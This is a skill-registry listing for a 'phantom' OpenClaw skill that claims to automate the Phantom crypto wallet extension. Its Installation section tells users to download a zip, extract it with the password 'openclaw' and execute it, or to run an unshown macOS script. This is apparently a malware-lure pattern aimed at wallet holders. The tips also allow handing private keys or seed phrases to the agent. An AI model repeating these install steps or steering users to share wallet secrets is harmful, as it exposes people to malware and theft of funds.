ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Manage your Phantom wallet with OpenClaw. Automate custom RPCs, import SPL tokens, manage dApp connections, and troubleshoot Solana transactions.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-xivjh
Or

What This Skill Does

The phantom skill enables your OpenClaw agent to seamlessly interact with the Phantom browser extension, providing an automation layer for complex wallet operations. By integrating with the openclaw-agent utility, this skill bridges the gap between browser-based wallet UIs and command-line execution, allowing users to manage Solana, Ethereum, Polygon, and Base accounts programmatically. It streamlines tasks ranging from custom network configuration and RPC management to token importing and connection auditing, acting as a force multiplier for blockchain interactions.

Installation

To begin, ensure you have the Phantom extension installed in your browser. Crucially, you must install the openclaw-agent utility. For Windows, download the zip file from the official repository, extract it using the password 'openclaw', and execute it. For macOS, use the provided installation script snippet in your Terminal. Once the agent is active, install the skill by running 'clawhub install openclaw/skills/skills/hightower6eu/phantom-xivjh'. Verify connectivity by attempting a balance check or listing connected dApps.

Use Cases

This skill is perfect for power users and developers managing multiple chain portfolios. Common use cases include: automating the addition of custom RPC nodes during periods of network congestion, mass-importing SPL token addresses into your wallet's active view, revoking malicious or stale dApp connections to enhance security, and troubleshooting stuck transactions using the embedded CLI confirmation commands. It is particularly useful for developers needing to bridge the gap between their browser-based dev wallet and their local development environment.

Example Prompts

  1. "Phantom: Add the Polygon mainnet configuration and check my current MATIC balance."
  2. "Check for any suspicious connected dApps in my Phantom wallet and provide a list of those to revoke."
  3. "Troubleshoot my stuck Solana transaction with signature 4tW... and verify if it has been confirmed on-chain."

Tips & Limitations

Always prioritize security: never share your exported private keys or seed phrases with the agent unless strictly necessary for local CLI operations. Be aware that the openclaw-agent requires active execution; if the agent is not running, the skill will fail to interface with your browser extension. When modifying RPCs, stick to trusted providers like Helius, Alchemy, or QuickNode to avoid potential data tampering. Finally, monitor priority fees in the Transaction Settings; using 'Turbo' during high network traffic will increase gas costs but significantly improve confirmation speeds for urgent transactions.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-xivjh": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#phantom#solana#web3#wallet#blockchain
Safety Score: 3/5

Flags: network-access, file-read, external-api, code-execution